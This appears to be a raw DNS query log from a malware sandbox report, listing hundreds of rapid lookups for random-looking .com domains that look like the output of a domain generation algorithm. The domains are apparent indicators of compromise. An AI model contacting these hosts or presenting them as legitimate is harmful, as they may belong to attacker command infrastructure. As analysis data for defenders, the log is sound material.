                                                                                                                                                                                                              Nov 11, 2024 18:33:29.438152075 CET192.168.2.81.1.1.10x419cStandard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.448765039 CET192.168.2.81.1.1.10xe389Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.458911896 CET192.168.2.81.1.1.10x38f8Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.482379913 CET192.168.2.81.1.1.10x240Standard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.495222092 CET192.168.2.81.1.1.10xb85bStandard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.502729893 CET192.168.2.81.1.1.10x3d20Standard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.505968094 CET192.168.2.81.1.1.10xfcafStandard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.508698940 CET192.168.2.81.1.1.10x1afcStandard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.517563105 CET192.168.2.81.1.1.10xc1b7Standard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.519627094 CET192.168.2.81.1.1.10x1c9cStandard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.520466089 CET192.168.2.81.1.1.10x825aStandard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.520500898 CET192.168.2.81.1.1.10xfec9Standard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.521068096 CET192.168.2.81.1.1.10x73cdStandard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.522257090 CET192.168.2.81.1.1.10x7495Standard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.537844896 CET192.168.2.81.1.1.10x260eStandard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.542768955 CET192.168.2.81.1.1.10x2e7fStandard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.544404984 CET192.168.2.81.1.1.10x9bfeStandard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.545022964 CET192.168.2.81.1.1.10x18a5Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.547482967 CET192.168.2.81.1.1.10xf21Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.548379898 CET192.168.2.81.1.1.10x40f0Standard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.548748970 CET192.168.2.81.1.1.10xaebeStandard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.551665068 CET192.168.2.81.1.1.10x848fStandard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.554352999 CET192.168.2.81.1.1.10x5218Standard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.554547071 CET192.168.2.81.1.1.10xf0d0Standard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.554769993 CET192.168.2.81.1.1.10x7b54Standard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.555691004 CET192.168.2.81.1.1.10x6474Standard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.558670998 CET192.168.2.81.1.1.10x597fStandard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.559050083 CET192.168.2.81.1.1.10xe54cStandard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.560358047 CET192.168.2.81.1.1.10x3d1eStandard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.561000109 CET192.168.2.81.1.1.10xc360Standard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.569375992 CET192.168.2.81.1.1.10x63b5Standard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.569627047 CET192.168.2.81.1.1.10x74e0Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.569868088 CET192.168.2.81.1.1.10xa5e2Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.570466995 CET192.168.2.81.1.1.10xd5ceStandard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.570645094 CET192.168.2.81.1.1.10x72c5Standard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.570801973 CET192.168.2.81.1.1.10xbd88Standard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.570941925 CET192.168.2.81.1.1.10xfb12Standard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.571069956 CET192.168.2.81.1.1.10x26faStandard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.579818010 CET192.168.2.81.1.1.10x4afeStandard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.580984116 CET192.168.2.81.1.1.10xaa36Standard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.581118107 CET192.168.2.81.1.1.10xe4eaStandard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.581191063 CET192.168.2.81.1.1.10xb92eStandard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.587439060 CET192.168.2.81.1.1.10xd75aStandard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.588093042 CET192.168.2.81.1.1.10xa9b9Standard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.588296890 CET192.168.2.81.1.1.10xe4a7Standard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.588552952 CET192.168.2.81.1.1.10xe9a6Standard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.588716030 CET192.168.2.81.1.1.10x39cfStandard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.588862896 CET192.168.2.81.1.1.10x39c3Standard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.589217901 CET192.168.2.81.1.1.10x8c40Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.589457989 CET192.168.2.81.1.1.10xd6adStandard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.589538097 CET192.168.2.81.1.1.10x5fa4Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.589626074 CET192.168.2.81.1.1.10x5d88Standard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.589766026 CET192.168.2.81.1.1.10x9a98Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.589917898 CET192.168.2.81.1.1.10xa248Standard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.589996099 CET192.168.2.81.1.1.10xee0cStandard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.590147018 CET192.168.2.81.1.1.10xa608Standard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.590238094 CET192.168.2.81.1.1.10xcc7bStandard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.594428062 CET192.168.2.81.1.1.10xc018Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.595123053 CET192.168.2.81.1.1.10x6903Standard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.598182917 CET192.168.2.81.1.1.10xaef7Standard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.991086006 CET192.168.2.81.1.1.10xfbe8Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.991395950 CET192.168.2.81.1.1.10x638fStandard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.991492033 CET192.168.2.81.1.1.10xd8faStandard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.993717909 CET192.168.2.81.1.1.10xc549Standard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.994436979 CET192.168.2.81.1.1.10xa524Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.998078108 CET192.168.2.81.1.1.10x212Standard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.998548985 CET192.168.2.81.1.1.10xe36aStandard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.025072098 CET192.168.2.81.1.1.10x2148Standard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.031758070 CET192.168.2.81.1.1.10xed2aStandard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.031954050 CET192.168.2.81.1.1.10xc512Standard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.032186985 CET192.168.2.81.1.1.10x95c1Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.032818079 CET192.168.2.81.1.1.10xf847Standard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.042437077 CET192.168.2.81.1.1.10x4f87Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.043154001 CET192.168.2.81.1.1.10x3e9fStandard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.044725895 CET192.168.2.81.1.1.10x8ac0Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.045363903 CET192.168.2.81.1.1.10x3098Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.045607090 CET192.168.2.81.1.1.10xdbe8Standard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.047776937 CET192.168.2.81.1.1.10x4ddcStandard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.048872948 CET192.168.2.81.1.1.10xf07cStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.049915075 CET192.168.2.81.1.1.10x1f80Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.054660082 CET192.168.2.81.1.1.10x3fdcStandard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.058887005 CET192.168.2.81.1.1.10x3678Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.059220076 CET192.168.2.81.1.1.10x8815Standard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.061368942 CET192.168.2.81.1.1.10xea83Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.061764002 CET192.168.2.81.1.1.10xa713Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.100764036 CET192.168.2.81.1.1.10xd7bbStandard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.101608992 CET192.168.2.81.1.1.10xc38cStandard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.101969957 CET192.168.2.81.1.1.10x826dStandard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.102195024 CET192.168.2.81.1.1.10xecc8Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.102375031 CET192.168.2.81.1.1.10x77d4Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.102530003 CET192.168.2.81.1.1.10x82c7Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.102667093 CET192.168.2.81.1.1.10xa400Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.104625940 CET192.168.2.81.1.1.10x8dc8Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.104775906 CET192.168.2.81.1.1.10xc20aStandard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.104811907 CET192.168.2.81.1.1.10xe203Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.104995012 CET192.168.2.81.1.1.10x77bfStandard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.105149031 CET192.168.2.81.1.1.10xe6acStandard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.105410099 CET192.168.2.81.1.1.10x62a0Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.105638981 CET192.168.2.81.1.1.10xd27dStandard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.105806112 CET192.168.2.81.1.1.10x206eStandard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.105943918 CET192.168.2.81.1.1.10xe156Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.106086016 CET192.168.2.81.1.1.10x1131Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.106497049 CET192.168.2.81.1.1.10x95a4Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.106921911 CET192.168.2.81.1.1.10x1b2Standard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.107578039 CET192.168.2.81.1.1.10x9f5aStandard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.113425016 CET192.168.2.81.1.1.10xf355Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.114479065 CET192.168.2.81.1.1.10xeaadStandard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.114552021 CET192.168.2.81.1.1.10x8b23Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.114655972 CET192.168.2.81.1.1.10xd326Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.114741087 CET192.168.2.81.1.1.10x3f3dStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.115201950 CET192.168.2.81.1.1.10x37a5Standard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.115237951 CET192.168.2.81.1.1.10x763Standard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.115426064 CET192.168.2.81.1.1.10x5deeStandard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.115609884 CET192.168.2.81.1.1.10x2ffcStandard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.116189957 CET192.168.2.81.1.1.10x76d7Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.118343115 CET192.168.2.81.1.1.10x1ac4Standard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.120902061 CET192.168.2.81.1.1.10xafbStandard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.121144056 CET192.168.2.81.1.1.10x10eaStandard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.125034094 CET192.168.2.81.1.1.10xe2bStandard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.132260084 CET192.168.2.81.1.1.10xa72aStandard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.140161991 CET192.168.2.81.1.1.10x422dStandard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.140362024 CET192.168.2.81.1.1.10x88b4Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.140664101 CET192.168.2.81.1.1.10x67eaStandard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.141455889 CET192.168.2.81.1.1.10x940aStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.693367958 CET192.168.2.81.1.1.10xcccaStandard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.696196079 CET192.168.2.81.1.1.10x296dStandard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.698772907 CET192.168.2.81.1.1.10x832Standard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.698967934 CET192.168.2.81.1.1.10x160dStandard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.703991890 CET192.168.2.81.1.1.10xf4edStandard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.704301119 CET192.168.2.81.1.1.10xc982Standard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.704663992 CET192.168.2.81.1.1.10xd3a4Standard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.705024004 CET192.168.2.81.1.1.10x578bStandard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.705302000 CET192.168.2.81.1.1.10x9505Standard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.705898046 CET192.168.2.81.1.1.10x9062Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.706376076 CET192.168.2.81.1.1.10x1ffeStandard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.706705093 CET192.168.2.81.1.1.10x6d91Standard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.707012892 CET192.168.2.81.1.1.10xba81Standard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.707257032 CET192.168.2.81.1.1.10x9007Standard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.707634926 CET192.168.2.81.1.1.10xfe77Standard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.708857059 CET192.168.2.81.1.1.10x358aStandard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.709033012 CET192.168.2.81.1.1.10x38d0Standard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.709424019 CET192.168.2.81.1.1.10xdc29Standard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.709841013 CET192.168.2.81.1.1.10x74c6Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.719001055 CET192.168.2.81.1.1.10x7836Standard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.719170094 CET192.168.2.81.1.1.10x84ccStandard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.720278978 CET192.168.2.81.1.1.10xb40cStandard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.720387936 CET192.168.2.81.1.1.10x5c4eStandard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.720710993 CET192.168.2.81.1.1.10x2834Standard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.729577065 CET192.168.2.81.1.1.10x84e9Standard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.733486891 CET192.168.2.81.1.1.10xa39aStandard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.733721972 CET192.168.2.81.1.1.10x83e3Standard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.734002113 CET192.168.2.81.1.1.10x358bStandard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.734165907 CET192.168.2.81.1.1.10x96e2Standard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.734316111 CET192.168.2.81.1.1.10xcd17Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.737469912 CET192.168.2.81.1.1.10xfc2cStandard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.737673044 CET192.168.2.81.1.1.10x9cf4Standard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.738007069 CET192.168.2.81.1.1.10xee49Standard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.738326073 CET192.168.2.81.1.1.10x4e90Standard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.739866018 CET192.168.2.81.1.1.10xa932Standard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.749475956 CET192.168.2.81.1.1.10x33dcStandard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.752393007 CET192.168.2.81.1.1.10x52f0Standard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.754487038 CET192.168.2.81.1.1.10xcb42Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.798160076 CET192.168.2.81.1.1.10x4a29Standard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.799439907 CET192.168.2.81.1.1.10x72d9Standard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.799792051 CET192.168.2.81.1.1.10x599eStandard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.800266981 CET192.168.2.81.1.1.10x275aStandard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.800513029 CET192.168.2.81.1.1.10x530cStandard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.800829887 CET192.168.2.81.1.1.10x4a4aStandard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.801017046 CET192.168.2.81.1.1.10x1109Standard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.807219982 CET192.168.2.81.1.1.10xe767Standard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.807406902 CET192.168.2.81.1.1.10xd2d2Standard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.807717085 CET192.168.2.81.1.1.10x683fStandard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.810883999 CET192.168.2.81.1.1.10xb39dStandard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.811045885 CET192.168.2.81.1.1.10x95dfStandard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.812129974 CET192.168.2.81.1.1.10x5cf7Standard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.813947916 CET192.168.2.81.1.1.10x75f8Standard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.813971043 CET192.168.2.81.1.1.10xa2a6Standard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.814510107 CET192.168.2.81.1.1.10x4ea8Standard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.814682007 CET192.168.2.81.1.1.10xfdceStandard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.814870119 CET192.168.2.81.1.1.10xcf48Standard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.815299988 CET192.168.2.81.1.1.10x84ddStandard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.815454960 CET192.168.2.81.1.1.10xae74Standard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.816004038 CET192.168.2.81.1.1.10xc755Standard query (0)qedyqal.comA (IP address)IN (0x0001)false
